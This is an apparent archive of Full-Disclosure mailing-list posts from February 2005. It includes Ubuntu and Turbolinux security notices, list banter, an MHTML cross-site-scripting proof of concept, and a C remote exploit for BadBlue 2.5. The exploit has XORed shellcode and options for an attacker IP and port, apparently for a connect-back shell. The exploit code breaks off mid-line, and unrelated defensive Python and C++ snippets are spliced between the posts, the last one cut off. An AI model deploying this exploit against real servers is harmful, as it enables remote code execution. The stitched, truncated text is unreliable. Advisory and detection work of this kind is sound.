Re: [Full-Disclosure] client - server
Most likely they have blocked the entire pool of IPs belonging to your ISP; try to visit the website with a proxy server.

On Sun, 27 Feb 2005 21:29:18 -0500, Eric Windisch [EMAIL PROTECTED] wrote:
> On Mon, 2005-02-28 at 02:43 +0100, Matteo Giannone wrote:
> > - a simple ip check doesn't work with dynamic addresses...
>
> It will work for as long as your IP is valid. They can also ban the entire IP block (aka, your ISP).
>
> > - computer name can be changed
> > - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac)
>
> Your browser will not (or should not, anyway) reveal your computer name or mac address.
>
> > Anything else ?
>
> User-agents and referers. Some browsers can send quite a bit of information in the user-agent string.
>
> It could also be a content filter between you and the web site in question. Schools and parents set these up to censor the surfing of children. Many companies filter their content too, due to the distraction (and legal ramifications) brought about by warez and pornography.
>
> > How the hell do they recognize me ?
>
> By the tin-foil hat ;)
>
> --
> Eric Windisch [EMAIL PROTECTED]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

--
Gautam R. Singh
http://www.google.com/search?q=gautam.singh%40gmail.com
[mcp,ccna,cspfa,]
t: +91 9885576081 | pgp: http://gautam.techwhack.com/key/ | ymsgr: er-333 | msn: [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)
(reposting again with the hole history)

Andres Tarasco of sia.es has published yesterday a security hole affecting BadBlue 2.5 and below.
http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html

Hat-Squad.com brought you a fresh exploit. The exploit and BadBlue v2.5 are both available at class101.org for your exploitation's practices, njoy :)

/*
BadBlue, Easy File Sharing Remote BOverflow

Homepage: badblue.com
Affected version: v2.5 (2.60 and below not tested)
Patched version: v2.61
Link: badblue.com/bbs98.exe
Date: 27 February 2005
Application Risk: Severely High
Internet Risk: Low
Discovery Credits: Andres Tarasco (atarasco _at_ sia.es)
Exploit Credits : class101 metasploit.com

Hole History:
26-2-2005: BOF flaw published by Andres Tarasco of sia.es
27-2-2002: Hat-Squad.com releases an exploit
28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs.

Notes:
-6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by BadBlue
-using offsets from ext.dll, universal.
-use findjmp2 to quick search into ext.dll to see if the offsets change in the other BadBlue versions below 2.5
-if you need the v2.5 for exploitation's practices, get it on class101.org
-rename to .c for nux, haven't tested this one but it should work fine.

Greet: Nima Majidi Behrang Fouladi Pejman Hat-Squad.com metasploit.com A^C^E of addict3d.org str0ke of milw0rm.com and my homy class101.org :
*/

#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif

char scode[]= /*XORed, I kiss metasploit.com because they are what means elite!*/
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x03"
"\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\xeb\x82\xa4\xec"
"\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x7b\x7a\xb4\x98"
"\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x88\x7a\xb5\x22"
"\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\xe8\x8f\x60\x47"
"\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x48\xf0\x04\x0f"
"\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\xc3\x1f\xd0\x53"
"\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x6b\xf5\x15\x1d"
"\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x6b\x0c\x28\x21"
"\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x5c\xf2\xbe\x75"
"\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\xf6\xd6\x0c\xec"
"\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x65\x13\x5b\x76"
"\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\xd5\x11\x4b\x42"
"\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x56\x84\x8b\x7b"
"\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\xd3\xe8\x33\xf4"
"\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x65\x13\x38\x7e"
"\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\xe1\x4a\x9b\xe0"
"\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\xa8\xd0\x33\x61"
"\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x52\x2a\x31\x12"
"\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\xfc\xad\x31\xec"
"\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x51\x84\x8b\x7b"
"\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";

char payload[1024];
char ebx[]="\x05\x53\x02\x10"; /*call.ext.dll*/
char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;*/
char pad[]="\xEB\x0C\x90\x90";
char pad2[]="\xE9\x05\xFE\xFF\xFF";
char EOL[]="\x0D\x0A\x0D\x0A";
char talk[]=
"\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x3F\x6D\x66\x63"
"\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x3D";

#ifdef WIN32
WSADATA wsadata;
#endif

void ver();
void usage(char* us);

int main(int argc,char *argv[])
{
  ver();
  unsigned long gip;
  unsigned short gport;
  char *target, *os;

  if (argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1;}
  if (argc==5){usage(argv[0]);return -1;}
  if (strlen(argv[2])<7){usage(argv[0]);return -1;}
  if (argc==6) {
    if (strlen(argv[4])<7){usage(argv[0]);return -1;}
  }

#ifndef WIN32
  if (argc==6) {
    gip=inet_addr(argv[4])^(long)0x93939393;
    gport=htons(atoi(argv[5]))^(short)0x9393;
  }
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
  if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
  if (argc==6) {
    gip=inet_addr(argv[4])^(ULONG)0x93939393;
    gport=htons(atoi(argv[5]))^(USHORT)0x9393;
  }
#endif

  int ip=htonl(inet_addr(argv[2])), port;
  if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;

  SOCKET s;fd_set mask;struct timeval timeout;
  struct sockaddr_in server;
  s=socket(AF_INET,SOCK_STREAM,0);
  if (s==-1){printf("[+] socket() error\n");return -1;}

  if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro. English\n[+]Win2k SP- - -";}
  if (atoi(argv[1]) == 2){target=ebx2;os="WinXP
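A defender-side check for the request pattern the exploit above sends (its `talk[]` string decodes to `GET /ext.dll?mfcisapicommand=`), written here as an added Python example that is not part of the Hat-Squad post: it scans access-log lines and flags ext.dll requests whose mfcisapicommand value is far longer than a legitimate command or contains non-printable bytes. The Common Log Format layout, the 256-byte threshold and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Threshold is an assumption: a legitimate mfcisapicommand value is a short
# keyword, whereas the exploit above fills a 1024-byte payload buffer.
MAX_COMMAND_LEN = 256

# Assumed access-log layout (Common Log Format); adjust for the server in use.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Constructed sample log lines: two ordinary BadBlue requests, then two that
# carry an oversized and a binary mfcisapicommand value (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Feb/2005:21:03:11 +0100] "GET /ext.dll?mfcisapicommand=loadpage&page=index.html HTTP/1.0" 200 1532',
    '192.0.2.10 - - [27/Feb/2005:21:03:12 +0100] "GET /images/logo.gif HTTP/1.0" 200 4311',
    '10.0.0.5 - - [27/Feb/2005:21:04:40 +0100] "GET /ext.dll?mfcisapicommand=' + "A" * 600 + ' HTTP/1.0" 500 0',
    '10.0.0.5 - - [27/Feb/2005:21:04:41 +0100] "GET /ext.dll?mfcisapicommand=ab%EB%0C%90%90cd HTTP/1.0" 400 0',
]


def inspect_request_target(target):
    """Return the reasons (possibly none) why a request target looks like an
    attempt to overflow the ext.dll mfcisapicommand handler."""
    reasons = []
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/ext.dll"):
        return reasons
    # Split the query by hand so the value is percent-decoded exactly once,
    # to bytes, without the lossy text decoding parse_qsl would apply.
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() != "mfcisapicommand":
            continue
        raw = unquote_to_bytes(value)
        if len(raw) > MAX_COMMAND_LEN:
            reasons.append(f"mfcisapicommand length {len(raw)} > {MAX_COMMAND_LEN}")
        if any(b < 0x20 or b > 0x7E for b in raw):
            reasons.append("mfcisapicommand contains non-printable bytes")
    return reasons


def scan_log(lines):
    """Return (source_ip, target, reasons) for every suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request_target(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {target[:60]}... -> {'; '.join(reasons)}")
```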
[Full-Disclosure] [USN-86-1] cURL vulnerability
===
Ubuntu Security Notice USN-86-1          February 28, 2005
curl vulnerability
CAN-2005-0940
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libcurl2
libcurl2-gssapi

The problem can be corrected by upgrading the affected package to version 7.12.0.is.7.11.2-1ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

infamous41md discovered a buffer overflow in cURL's NT LAN Manager (NTLM) authentication handling. By sending a specially crafted long NTLM reply packet, a remote attacker could overflow the reply buffer. This could lead to execution of arbitrary attacker specified code with the privileges of the application using the cURL library.

Source archives:

  http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2-1ubuntu0.1.diff.gz
    Size/MD5:  160391 4f1c042b0f375a8d06e0403e5baa3b7e
  http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2-1ubuntu0.1.dsc
    Size/MD5:     707 5ec7fa4228218f3186ad7f41ef1b56eb
  http://security.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.12.0.is.7.11.2.orig.tar.gz
    Size/MD5: 1435629 25e6617ea7dec34d072426942b77801f
[Full-Disclosure] [USN-87-1] Cyrus IMAP server vulnerability
===
Ubuntu Security Notice USN-87-1          February 28, 2005
cyrus21-imapd vulnerability
CAN-2005-0546
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

cyrus21-imapd

The problem can be corrected by upgrading the affected package to version 2.1.16-6ubuntu0.3. In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Sean Larsson discovered a buffer overflow in the IMAP annotate extension. This possibly allowed an authenticated IMAP client to execute arbitrary code with the privileges of the Cyrus IMAP server.

Source archives:

  http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16-6ubuntu0.3.diff.gz
    Size/MD5:  236064 389812cf102f362acbdd8427d42a3fcc
  http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16-6ubuntu0.3.dsc
    Size/MD5:    1040 7b56583400526281be8452c3c9ce24df
  http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-imapd_2.1.16.orig.tar.gz
    Size/MD5: 1687454 8f4ff803a910d0f4e4cfab3b13a6080d

Architecture independent packages:

  http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-admin_2.1.16-6ubuntu0.3_all.deb
    Size/MD5:   87974 ea896023fb72b192e5b84d97e1c9f612
  http://security.ubuntu.com/ubuntu/pool/main/c/cyrus21-imapd/cyrus21-doc_2.1.16-6ubuntu0.3_all.deb
    Size/MD5:  206610 6c655f7135379dc53f7a12f648717af3
[Full-Disclosure] [USN-88-1] reportbug information disclosure
===
Ubuntu Security Notice USN-88-1          February 28, 2005
reportbug information disclosure
https://bugzilla.ubuntulinux.org/6600
https://bugzilla.ubuntulinux.org/6717
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

reportbug

The problem can be corrected by upgrading the affected package to version 2.62ubuntu1.1. In general, a standard system upgrade is sufficient to effect the necessary changes. However, if your users already have ~/.reportbugrc files with SMTP passwords, you need to manually change their permissions with

  chmod 600 .reportbugrc

Details follow:

Rolf Leggewie discovered two information disclosure bugs in reportbug.

The per-user configuration file ~/.reportbugrc was created world-readable. If it contained email smarthost passwords, these were readable by any other user on the computer storing the home directory.

reportbug usually includes the settings from ~/.reportbugrc in generated bug reports. This included the smtppasswd setting (the password for an SMTP email smarthost) as well. The password is now hidden from reports.

Source archives:

  http://security.ubuntu.com/ubuntu/pool/main/r/reportbug/reportbug_2.62ubuntu1.1.dsc
    Size/MD5:     540 19dab43ca7c942311e87ad5e48e32a39
  http://security.ubuntu.com/ubuntu/pool/main/r/reportbug/reportbug_2.62ubuntu1.1.tar.gz
    Size/MD5:  115256 9b3fbec6a6974274068afb08835f0fdc

Architecture independent packages:

  http://security.ubuntu.com/ubuntu/pool/main/r/reportbug/reportbug_2.62ubuntu1.1_all.deb
    Size/MD5:  104630 f051c98020dffd1e8ae3253ab72e88ce
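A check for the two exposures the notice describes, as an added Python example that is not Ubuntu's or reportbug's own code: it flags a ~/.reportbugrc that other users can read, applies the chmod 600 fix the notice gives, and strips the smtppasswd value before the settings are quoted in a report. The one-setting-per-line file layout, the `<hidden>` placeholder and the sample config are assumptions.

```python
import os
import re
import stat
import tempfile

# The notice names smtppasswd; kept as a set so further secrets can be added.
SECRET_SETTINGS = frozenset({"smtppasswd"})

# Assumed ~/.reportbugrc line shape: "<setting> <value>", with blank lines
# and '#' comments ignored.
SETTING_RE = re.compile(r"^(\s*)([A-Za-z_]+)(\s+)(\S.*)$")


def is_world_readable(path):
    """True when 'other' users hold read permission on the file (first bug)."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def restrict_permissions(path):
    """Apply the notice's manual fix (chmod 600) and return the new mode bits."""
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return stat.S_IMODE(os.stat(path).st_mode)


def secret_settings_in(text):
    """Names of secret settings that appear with a value in the config text."""
    found = []
    for line in text.splitlines():
        m = SETTING_RE.match(line)
        if m and m.group(2).lower() in SECRET_SETTINGS:
            found.append(m.group(2).lower())
    return found


def redact_settings(text):
    """Replace secret values before the config is quoted in a report (second
    bug): the setting name survives so the report still shows it was set."""
    out = []
    for line in text.splitlines(keepends=True):
        m = SETTING_RE.match(line.rstrip("\r\n"))
        if m and m.group(2).lower() in SECRET_SETTINGS:
            line = f"{m.group(1)}{m.group(2)}{m.group(3)}<hidden>\n"
        out.append(line)
    return "".join(out)


def audit_rc_file(path, fix=False):
    """Describe one ~/.reportbugrc: whether it is world-readable, which secret
    settings it holds, and (if fix=True) the mode after chmod 600."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    result = {
        "path": path,
        "world_readable": is_world_readable(path),
        "secrets": secret_settings_in(text),
        "mode_after": None,
    }
    if fix and result["world_readable"]:
        result["mode_after"] = restrict_permissions(path)
    return result


def self_check():
    """Run the audit on a constructed config in a temporary directory."""
    sample = "smtphost mail.example.org\n# comment\nsmtppasswd hunter2\n"
    with tempfile.TemporaryDirectory() as tmp:
        rc = os.path.join(tmp, ".reportbugrc")
        with open(rc, "w", encoding="utf-8") as fh:
            fh.write(sample)
        os.chmod(rc, 0o644)  # the mode the vulnerable reportbug created it with
        report = audit_rc_file(rc, fix=True)
        report["still_world_readable"] = is_world_readable(rc)
        report["redacted"] = redact_settings(sample)
    return report


if __name__ == "__main__":
    for key, value in self_check().items():
        print(f"{key}: {value!r}")
```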
[Full-Disclosure] [TURBOLINUX SECURITY INFO] 28/Feb/2005
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is an announcement only email list for the x86 architecture.

Turbolinux Security Announcement 28/Feb/2005

The following page contains the security information of Turbolinux Inc.

- Turbolinux Security Center
  http://www.turbolinux.com/security/

(1) kernel - Multiple vulnerabilities exist in the Linux kernel

===
* kernel - Multiple vulnerabilities exist in the Linux kernel
===

More information:

The kernel package contains the Linux kernel -- the core of the Linux operating system.

Impact:

Please refer to the References section.

Affected Products:

- Turbolinux Appliance Server 1.0 Hosting Edition
- Turbolinux Appliance Server 1.0 Workgroup Edition
- Turbolinux 10 Server
- Turbolinux Home
- Turbolinux 10 F...
- Turbolinux 10 Desktop
- Turbolinux 8 Server
- Turbolinux 8 Workstation
- Turbolinux 7 Server
- Turbolinux 7 Workstation

Solution:

Please use the turbopkg (zabom) tool to apply the update.

- [Turbolinux 10 Server, Turbolinux 10 Desktop, Turbolinux 10 F..., Turbolinux Home]

  # turbopkg
  or
  # zabom -u kernel kernel-extramodules kernel-headers kernel-numa \
    kernel-pcmcia-cs kernel-smp kernel-smp64G kernel-source

- [other]

  # turbopkg
  or
  # zabom update kernel kernel-BOOT kernel-doc kernel-headers \
    kernel-pcmcia-cs kernel-smp kernel-smp64G kernel-source
Re: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)
next time then publish both at the same time, because coded or not, because of timeline, the exploit has been brought in first by hat-squad, sorry ;

-class101
Jr. Researcher
Hat-Squad.com-

----- Original Message -----
From: Andres Tarasco
To: '[EMAIL PROTECTED]'
Cc: 'full-disclosure@lists.netsys.com, [EMAIL PROTECTED]'
Sent: Monday, February 28, 2005 11:18 AM
Subject: RE: [Full-Disclosure] [HAT-SQUAD] BadBlue, Easy P2P File Sharing Remote Exploit (update)

> Hole History:
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs.

That's simply not true. Miguel Tarasco developed the first functional exploit for this vulnerability. This exploit was not published before because of the disclosure timeline.

regards

On Mon, 28 Feb 2005 09:42:11 +0100, class 101 [EMAIL PROTECTED] wrote:
> (reposting again with the hole history)
>
> Andres Tarasco of sia.es has published yesterday a security hole affecting BadBlue 2.5 and below.
> http://seclists.org/lists/fulldisclosure/2005/Feb/0704.html
>
> Hat-Squad.com brought you a fresh exploit. The exploit and BadBlue v2.5 are both available at class101.org for your exploitation's practices, njoy :)
>
> /*
> BadBlue, Easy File Sharing Remote BOverflow
>
> Homepage: badblue.com
> Affected version: v2.5 (2.60 and below not tested)
> Patched version: v2.61
> Link: badblue.com/bbs98.exe
> Date: 27 February 2005
> Application Risk: Severely High
> Internet Risk: Low
> Discovery Credits: Andres Tarasco (atarasco _at_ sia.es)
> Exploit Credits : class101 metasploit.com
>
> Hole History:
> 26-2-2005: BOF flaw published by Andres Tarasco of sia.es
> 27-2-2002: Hat-Squad.com releases an exploit
> 28-2-2005: haxorcitos releases a dupe with fake date : or you sux doing private stuffs.
Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(ev gpsc verify reciept please)
Is anyone a part of Orkut or know someone who is?

On Saturday, February 26, 2005, at 03:17PM, Ankush Kapoor [EMAIL PROTECTED] wrote:
> Combine Google's search capabilities with Orkut, and suddenly they know so much about so many people and how they are related. Connect keyhole to that which they recently bought, and voila it could be putting spy agencies to shame after a while!
>
> regards
> Ankush Kapoor
>
> On Sat, 26 Feb 2005 10:40:32 -0800, Steve Kudlak [EMAIL PROTECTED] wrote:
> > One sort of prediction does not say too much, but google has a lot of power because they have a lot of information.. Interesting it was very interesting to look at, although a lot of it was the power of the traditional media because I could have and did ignore most of the Swifties after an initial look through of their tactics which were traditional media stuff, but most people hold that somehow is real fact and truth. Interesting question is how did you take the freeform approach of the zeitgeist list and get from that to an actual who was going to win the election?
> >
> > Have Fun,
> > Sends Steve
> >
> > P.S. My friends in Ohio said it was very difficult to avoid the Swifties stuff if you looked at any public media. The interesting thing was the whole way I heard very little out here on the West Coast from the Bush Campaign and the Swifties but in Ohio friends got flooded daily with saturation media
> >
> > N.B. I post this to full-dis and other places because it does involve disclosure of techniques about how people accomplish things in the world using information tools
> >
> > bob wireless internet evdo wifi hotspot guy wrote:
> > > Google has all kinds of info... they are probably the most powerful entity on this planet... i looked up google's zeitgeist and the ratio of Kerry vs. Bush Searches BEFORE the election was the margin by which Bush WON... PREDICTIVE??? absolutely.
> > >
> > > X
> > > Robert Kim, Wireless Internet Wifi Hotspot Advisor
> > > http://evdo-coverage.com
> > > http://wireless-internet-broadband-service.com
> > > https://evdo.sslpowered.com/wifi-hotspot-router.htm
> > > 2611 S Pacific Coast Highway 101
> > > Cardiff by the Sea CA 92007 : 206 984 0880
> > > Wireless Internet Service Is ONLY Broadband with Broadband Customer Service(tm)
> > > OUR QUEST: To Kill the Cubicle! (SM)
> > > ---Shalo -;-)
> > >
> > > ----- Original Message -----
> > > From: Nancy Kramer [EMAIL PROTECTED]
> > > To: [EMAIL PROTECTED]; full-disclosure@lists.netsys.com
> > > Sent: Friday, February 25, 2005 12:46 PM
> > > Subject: Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation
> > >
> > > > If you run the Google Toolbar they do know where you have been surfing on the web. They do record it. That's how you pay for the Toolbar. Your theory sounds correct to me.
> > > >
> > > > Regards,
> > > > Nancy Kramer
RE: [lists] RE: [Full-Disclosure] Awake a modem with AT commands
[EMAIL PROTECTED] wrote on 02/26/2005 07:43:02 AM:

> Syed Imran Ali wrote:
> > I don't know if you specifically asked for DSL or Cable modems or what you exactly wanna do with it. As far as AT commands are your concerns, I think most of the ppl on the list can help you out. Btw, elucidate ur question please.
>
> Mr. Ali,
>
> Please be aware that action09 does not need to elucidate, as you obviously do not understand what she was saying to start with. I do not mean to mock you, but you really need to get a clue. True, my first modem was 300 baud, but if you try to issue an AT command to a DSL or cable modem, I think you will not get a response.
>
> Curt Purdy CISSP, GSEC, CNE, MCSE+I, CCDA
> Information Security Engineer
> DP Solutions

Curt, do you think that maybe, just maybe, the request Syed made of action09 to elucidate was in fact a request for clarification? One often does that when one does not clearly understand what is being said. Maybe a little less caffeine in your diet...just a thought.

Bart
[Full-Disclosure] Re: Full-Disclosure Digest, Vol 3, Issue 52
L.S.,

From 28 February up to and including 4 March I am out of the office. Your mail has arrived and will be answered from 7 March onwards. For urgent matters please contact Gijs van Blokland.
[EMAIL PROTECTED] / 020-5304323

Wiggert de Haan
ISIZ BV
[Full-Disclosure] [USN-89-1] XML library vulnerabilities
===
Ubuntu Security Notice USN-89-1          February 28, 2005
libxml vulnerabilities
CAN-2004-0989
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libxml1

The problem can be corrected by upgrading the affected package to version 1:1.8.17-8ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Several buffer overflows have been discovered in libxml's FTP connection and DNS resolution functions. Supplying very long FTP URLs or IP addresses might result in execution of arbitrary code with the privileges of the process using libxml. This does not affect the core XML parsing code, which is what the majority of programs use this library for.

Note: The same vulnerability was already fixed for libxml2 in USN-10-1.

Source archives:

  http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml_1.8.17-8ubuntu0.1.diff.gz
    Size/MD5:  361144 49c17811be2abc30c48984e0f46454fb
  http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml_1.8.17-8ubuntu0.1.dsc
    Size/MD5:     756 5d9e3b59a2d624d52af231926a84fb1d
  http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml_1.8.17.orig.tar.gz
    Size/MD5: 1016403 b8f01e43e1e03dec37dfd6b4507a9568
http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml-dev_1.8.17-8ubuntu0.1_powerpc.deb Size/MD5: 392636 b445671f31603b7e12b8c47fd7ea6697 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml1_1.8.17-8ubuntu0.1_powerpc.deb Size/MD5: 220004 e3cd12326fae6972a44ac59a8af97697 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML
Hi, LIST.

Subject: Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML Documents

NOTE: This bug had been provided by an unknown person on his site. This bug has been widely known in Japan since August 2004. (This news was reported.) Now his site is closed. Some engineers prevented this bug. They are maintaining Web services. Wiki, Webmail, Blog, BBS, those might be dangerous.

First: I want to show the following first. Please check it out using IE on XPSP2.

The cat is here.
http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg

And the cat is a script kitty.
mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg

You see? Executing JavaScript? OK.

If you are using an old IE or Windows, try this one.
mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg.mhtml

Confirmed?

Second: What is happening to us? Please check out.
http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt
or the same file,
http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt

This is a test message which demonstrates sending e-mail in HTML format according to RFC 2557. And check out, please.
mhtml:http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt
or the same file,
mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt

Third: Then we can change Content-Transfer-Encoding: from '7bit' to 'quoted-printable'. Check out, please.
http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt

-- q2.txt --
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: quoted-printable

=3C!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 3.2//EN=3E
=3CHTML=3E
=3CHEAD=3E=3CTITLE=3ETest message no. 3=3C/TITLE=3E
=3C/HEAD=3E
=3CBODY=3E
=3CH1=3EThis is test message no. 3=3C/H1=3E
=3CH2=3EHere comes the red test image:=3C/H2=3E
=3CIMG SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/red-test-image.gif; BORDER=3D0 HEIGHT=3D32 WIDTH=3D117 ALT=3Dred test image=3E
=3CH2=3EHere comes the yellow test image:=3C/H2=3E
=3CIMG SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/yellow-test-image.gif; BORDER=3D0 HEIGHT=3D32 WIDTH=3D152 ALT=3Dyellow test image=3E
=3CP=3EThis is the last line of this test message.
=3C/BODY=3E=3C/HTML=3E
-- q2.txt --

Where is the HTML TAG? Do you know how to sanitise?
mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt

The malicious code would be inserted by a malicious user on a Blog, Wiki, BBS with file uploader, etc. JPEG files or GIF files are also poisoned. There is a possible XSS issue on Windows XPSP2 IE6 via MHTML.

Reference:
Using HTML in E-mail
http://www.dsv.su.se/jpalme/ietf/mhtml.html
MIME Encapsulation of Aggregate HTML Documents (MHTML)
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cdosys/html/_cdosys_mime_encapsulation_of_aggregate_html_documents_mhtml_.asp
RFC 2045 - Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies
http://www.faqs.org/rfcs/rfc2045.html

===
Sorry for my bad English. Best Regards.
===
--
bitlance winter
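An added example (not the poster's code) of the sanitisation gap the post points at: a byte-level tag filter run on the raw upload finds no tags in a q2.txt-style part, because the body is quoted-printable and every '<' is stored as '=3C', while a client that honours Content-Transfer-Encoding decodes it first. The sample MIME part, the decoder and the naive filter are all constructed here; the defensive rule is to decode the transfer encoding before filtering.

```cpp
// Added example, not from the original post. Shows why a tag filter that
// inspects raw upload bytes misses quoted-printable HTML, and that decoding
// the Content-Transfer-Encoding first closes the gap.
#include <cctype>
#include <string>

// Minimal RFC 2045 quoted-printable decoder: "=XX" becomes the byte 0xXX,
// "=" followed by a line break is a soft break and is dropped, anything else
// is copied through. Malformed escapes are kept verbatim rather than guessed.
std::string DecodeQuotedPrintable(const std::string& in) {
    std::string out;
    for (std::size_t i = 0; i < in.size(); ++i) {
        if (in[i] != '=') { out += in[i]; continue; }
        if (i + 1 < in.size() && (in[i + 1] == '\r' || in[i + 1] == '\n')) {
            i += 1;                                   // soft line break
            if (in[i] == '\r' && i + 1 < in.size() && in[i + 1] == '\n') i += 1;
            continue;
        }
        if (i + 2 < in.size() && std::isxdigit((unsigned char)in[i + 1]) &&
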